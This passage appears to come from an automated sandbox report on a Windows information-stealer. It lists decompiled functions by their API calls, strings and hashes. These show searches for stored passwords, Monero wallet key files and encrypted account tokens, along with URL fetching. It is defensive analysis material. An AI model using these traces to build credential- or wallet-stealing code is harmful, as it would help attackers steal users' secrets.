                  • Instruction Fuzzy Hash: 22517FB1900618ABDB24DF90DC49BEE77BAFB04701F108098F605B72C0DBB4AA85DF95
                  Function 006272D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0062733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006273B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0062740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00627452
                  • HeapFree.KERNEL32(00000000), ref: 00627459
                  • task.LIBCPMTD ref: 00627555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuetask
                  • String ID: Password
                  • API String ID: 775622407-3434357891
                  • Opcode ID: 6e7de123e66707cc283c54c6b84f17af6c3c7a4301ae62df3b334c5abccb28ea
                  • Instruction ID: 8301fb3f806192fec80fd5e2c778d6f625b384f65271dacd72ba634a13a217f3
                  • Opcode Fuzzy Hash: 6e7de123e66707cc283c54c6b84f17af6c3c7a4301ae62df3b334c5abccb28ea
                  • Instruction Fuzzy Hash: 9B612AB59041689BDB24DB50DC45FDAB7B9BF44300F0081E9E689A7241DBB06BC9CFA5
                  Function 0062BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                  • lstrlen.KERNEL32(00000000), ref: 0062BC9F
                    • Part of subcall function 00638E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00638E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0062BCCD
                  • lstrlen.KERNEL32(00000000), ref: 0062BDA5
                  • lstrlen.KERNEL32(00000000), ref: 0062BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 37daff78115e086de37703779ca2798409966682987dca73f9acca98c836923d
                  • Instruction ID: f3a2158acd39e16fe407ac60ae8c37ed1d897f8b23a5a4e04b9b9e1442ff7b1e
                  • Opcode Fuzzy Hash: 37daff78115e086de37703779ca2798409966682987dca73f9acca98c836923d
                  • Instruction Fuzzy Hash: A3B15E72910108ABDB48EBE0DC96EEE733AAF54300F41416CF546B6191EF346A49DFE6
                  Function 00636770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: 3f9db084654396ca50d12005707f708da07f6f0613bb6ee3634e82b860076f3e
                  • Instruction ID: acebefb5f38915221a9c23a2a48d9ad4c815377c771e90722e330b9b07c74c60
                  • Opcode Fuzzy Hash: 3f9db084654396ca50d12005707f708da07f6f0613bb6ee3634e82b860076f3e
                  • Instruction Fuzzy Hash: 4BF0583090820DEFD348AFE0E909B6CBBB0FB04703F055198F649A6390EAB04B419FD6
                  Function 00624FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00624FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00624FD1
                  • InternetOpenA.WININET(00640DDF,00000000,00000000,00000000,00000000), ref: 00624FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00625011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00625041
                  • InternetCloseHandle.WININET(?), ref: 006250B9
                  • InternetCloseHandle.WININET(?), ref: 006250C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 09868d944f21f111c79c3ca0701d9423ee96d5f813e031914a9ccc135aba6106
                  • Instruction ID: 2b6fd6e5ee2597e26b4b67da25e18a9a5d85515727f01f4dacae6e23c3215e83
                  • Opcode Fuzzy Hash: 09868d944f21f111c79c3ca0701d9423ee96d5f813e031914a9ccc135aba6106
                  • Instruction Fuzzy Hash: 4731E6B4A00218ABDB24CF54DC85BDDB7B5FB48704F1081D9EA0AB7281D7B06AC58F99
                  Function 006383DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00638426
                  • wsprintfA.USER32 ref: 00638459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0063847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0063848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00638499
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,0131EFF8,00000000,000F003F,?,00000400), ref: 006384EC
                  • lstrlen.KERNEL32(?), ref: 00638501
                  • RegQueryValueExA.ADVAPI32(00000000,0131EF38,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00640B34), ref: 00638599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00638608
                  • RegCloseKey.ADVAPI32(00000000), ref: 0063861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: 3ea77e119ee35176becd42653d7812a665ec4f19f7f096a8b1deb55b37fc883e
                  • Instruction ID: b837986543f6a37844f82e3b14b10f73d915931b2ca9d916b26932d544e4d269
                  • Opcode Fuzzy Hash: 3ea77e119ee35176becd42653d7812a665ec4f19f7f096a8b1deb55b37fc883e
                  • Instruction Fuzzy Hash: 3721E7B1910228AFDB68DB54DC85FE9B3B9FB48700F00C598E649A7241DF71AA85CFD4
                  Function 00637690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006376A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 006376AB
                  • RegOpenKeyExA.ADVAPI32(80000002,0130C3D8,00000000,00020119,00000000), ref: 006376DD
                  • RegQueryValueExA.ADVAPI32(00000000,0131F070,00000000,00000000,?,000000FF), ref: 006376FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00637708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: ffdece992fe8acfbe2432f8b36153c9bdea66080f15b6819764a1e3983c23e35
                  • Instruction ID: 51b0f4b74f71a0f1a8e2c8206060a5bcb2a2c28028097b3bd48ea62ae38c7f52
                  • Opcode Fuzzy Hash: ffdece992fe8acfbe2432f8b36153c9bdea66080f15b6819764a1e3983c23e35
                  • Instruction Fuzzy Hash: F90162B5A04208BBEB14DBE4DD4AFADB7B9FB48701F105054FA05F7291E6B19900CF91
                  Function 00637720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0063773B
                  • RegOpenKeyExA.ADVAPI32(80000002,0130C3D8,00000000,00020119,006376B9), ref: 0063775B
                  • RegQueryValueExA.ADVAPI32(006376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0063777A
                  • RegCloseKey.ADVAPI32(006376B9), ref: 00637784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 60b6bbe7b49131e3e027c2ece5967426a489378660eacc69c02ca50c95b08d3f
                  • Instruction ID: 8c0ff24665d8b22c21e1eed61b0dc6888ceadcba0c999ec870716947d7cde0b2
                  • Opcode Fuzzy Hash: 60b6bbe7b49131e3e027c2ece5967426a489378660eacc69c02ca50c95b08d3f
                  • Instruction Fuzzy Hash: 6C0144B5A40308BBD704DBE4DC4AFAEB7B8FB44701F104158FA05B7281D6B065008F91
                  Function 006392E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(:c,80000000,00000003,00000000,00000003,00000080,00000000,?,00633AEE,?), ref: 006392FC
                  • GetFileSizeEx.KERNEL32(000000FF,:c), ref: 00639319
                  • CloseHandle.KERNEL32(000000FF), ref: 00639327
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID: :c$:c
                  • API String ID: 1378416451-4176724484
                  • Opcode ID: edd55d5e4abb91307072e7fad2542054f030706fef85341dc8f2d35a42717bce
                  • Instruction ID: a5f64fe5227e774b12b1fc5689e042629c96d24790ea83d938357f74841a4192
                  • Opcode Fuzzy Hash: edd55d5e4abb91307072e7fad2542054f030706fef85341dc8f2d35a42717bce
                  • Instruction Fuzzy Hash: 75F03C75E44208BBEB14DBB0DC49B9E77FABB48710F118254F651A72C0D6B196018F91
                  Function 006299C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006299EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00629A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00629A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,0062148F,00000000), ref: 00629A5A
                  • LocalFree.KERNEL32(0062148F), ref: 00629A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00629A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 61b7643ece6369b867f145a1de0c7b2d2e95678eece021778fa14e29323051c3
                  • Instruction ID: 7a8c225e3f94a2625788e3204f38a14d43a72646779ded6068740bab93dad1b4
                  • Opcode Fuzzy Hash: 61b7643ece6369b867f145a1de0c7b2d2e95678eece021778fa14e29323051c3
                  • Instruction Fuzzy Hash: C931F6B4A00209EFDB14CF94D985BEE77B6FF88340F108158E911AB390D775AA41CFA1
                  Function 00634780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcat.KERNEL32(?,0131F3E8), ref: 006347DB
                    • Part of subcall function 00638DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00638E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00634801
                  • lstrcat.KERNEL32(?,?), ref: 00634820
                  • lstrcat.KERNEL32(?,?), ref: 00634834
                  • lstrcat.KERNEL32(?,0130B940), ref: 00634847
                  • lstrcat.KERNEL32(?,?), ref: 0063485B
                  • lstrcat.KERNEL32(?,0131ED50), ref: 0063486F
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 00638D90: GetFileAttributesA.KERNEL32(00000000,?,00621B54,?,?,0064564C,?,?,00640E1F), ref: 00638D9F
                    • Part of subcall function 00634570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00634580
                    • Part of subcall function 00634570: RtlAllocateHeap.NTDLL(00000000), ref: 00634587
                    • Part of subcall function 00634570: wsprintfA.USER32 ref: 006345A6
                    • Part of subcall function 00634570: FindFirstFileA.KERNEL32(?,?), ref: 006345BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
